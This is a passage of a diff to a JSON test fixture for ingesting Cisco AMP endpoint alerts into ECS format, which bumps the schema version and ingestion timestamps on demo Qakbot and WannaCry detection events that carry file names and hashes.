}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -4597,7 +4597,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4621,7 +4621,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843673656Z",
+                "ingested": "2021-09-13T18:07:04.510433405Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -4676,7 +4676,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4700,7 +4700,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843675538Z",
+                "ingested": "2021-09-13T18:07:04.510435245Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -4753,7 +4753,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -4773,7 +4773,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843677434Z",
+                "ingested": "2021-09-13T18:07:04.510437110Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -4839,7 +4839,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4869,7 +4869,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843679334Z",
+                "ingested": "2021-09-13T18:07:04.510438994Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -4939,7 +4939,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "user": [
@@ -4971,7 +4971,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843681225Z",
+                "ingested": "2021-09-13T18:07:04.510440850Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
                 "kind": "alert",
                 "action": "Threat Detected",
@@ -5028,7 +5028,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5048,7 +5048,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843683113Z",
+                "ingested": "2021-09-13T18:07:04.510442708Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
                 "kind": "alert",
                 "action": "Threat Quarantined",
@@ -5099,7 +5099,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5119,7 +5119,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843684983Z",
+                "ingested": "2021-09-13T18:07:04.510444555Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -5174,7 +5174,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5194,7 +5194,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843686880Z",
+                "ingested": "2021-09-13T18:07:04.510446430Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
@@ -5249,7 +5249,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5269,7 +5269,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843688761Z",
+                "ingested": "2021-09-13T18:07:04.510448315Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
@@ -5322,7 +5322,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5346,7 +5346,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843690628Z",
+                "ingested": "2021-09-13T18:07:04.510450164Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"igvj$vN.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\igvj$vN.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -5401,7 +5401,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5425,7 +5425,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843705689Z",
+                "ingested": "2021-09-13T18:07:04.510452021Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -5482,7 +5482,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5508,7 +5508,7 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-12T17:31:29.843709643Z",
+                "ingested": "2021-09-13T18:07:04.510453895Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}",
                 "kind": "alert",
                 "action": "Retrospective Detection",
@@ -5561,7 +5561,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5581,7 +5581,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843711565Z",
+                "ingested": "2021-09-13T18:07:04.510455739Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -5636,7 +5636,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5656,7 +5656,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843713424Z",
+                "ingested": "2021-09-13T18:07:04.510457608Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -5711,7 +5711,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5731,7 +5731,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843715300Z",
+                "ingested": "2021-09-13T18:07:04.510459484Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
                 "kind": "alert",
                 "action": "Quarantine Failure",
@@ -5786,7 +5786,7 @@
                 }
             },
             "ecs": {
-                "version": "1.11.0"
+                "version": "1.12.0"
             },
             "related": {
                 "hosts": [
@@ -5806,7 +5806,7 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-12T17:31:29.843717182Z",
+                "ingested": "2021-09-13T18:07:04.510461339Z",
